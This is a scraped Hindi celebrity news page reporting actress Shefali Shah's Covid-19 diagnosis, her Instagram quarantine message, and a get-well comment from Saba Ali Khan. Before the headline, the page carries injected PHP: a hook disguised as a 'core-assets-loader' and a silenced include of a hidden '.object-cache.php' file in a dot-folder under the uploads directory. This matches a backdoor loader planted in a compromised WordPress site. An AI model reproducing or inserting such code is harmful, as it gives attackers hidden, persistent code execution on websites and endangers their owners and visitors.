add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Covid 19: कोरोना वायरस से संक्रमित हुईं एक्ट्रेस Shefali Shah, आलिया भट्ट के साथ ‘डार्लिंग्स’ में आईं थी नजर – SOCH INDIA
Menu

देश
Covid 19: कोरोना वायरस से संक्रमित हुईं एक्ट्रेस Shefali Shah, आलिया भट्ट के साथ ‘डार्लिंग्स’ में आईं थी नजर

nobanner

एक्ट्रेस शेफाली शाह कोरोना वायरस से संक्रमित हो गई हैं और एक्ट्रेस ने स्वयं इस बात की जानकारी फैंस को दी है. शेफाली ने एक सोशल मीडिया पोस्ट के जरिए अपने फैंस के साथ ये जानकारी शेयर की है. शेफाली ने अपने इंस्टाग्राम हैंडल पर एक क्रिप्टेड पोस्ट शेयर किया.

शेफाली ने पोस्ट में लिखा, “मैंने कोविड -19 के लिए सकारात्मक परीक्षण किया है. मैंने तुरंत खुद को अलग कर लिया है और होम क्वारंटाइन रहूंगी. मैं अपने डॉक्टरों की सलाह के तहत सभी सुरक्षा प्रोटोकॉल का पालन कर रही हूं. मेरे संपर्क में आने वाले सभी लोगों से अनुरोध है कि वे तुरंत परीक्षण करवाएं. आप सभी के प्यार और साथ का शुक्रिया.”

शेफाली के इस पोस्ट के सामने आते ही फैंस और सेलेब्स के रिएक्शन भी सामने आए और उन्होंने उनके जल्द स्वस्थ होने की कामना की. सैफ अली खान की बहन सबा अली खान उनके पोस्ट पर कमेंट करने वाले कुछ पहले लोगों में से थी. उन्होंने कमेंट कर कहा कि आपके जल्दी ठीक होने की कामना करती हूं.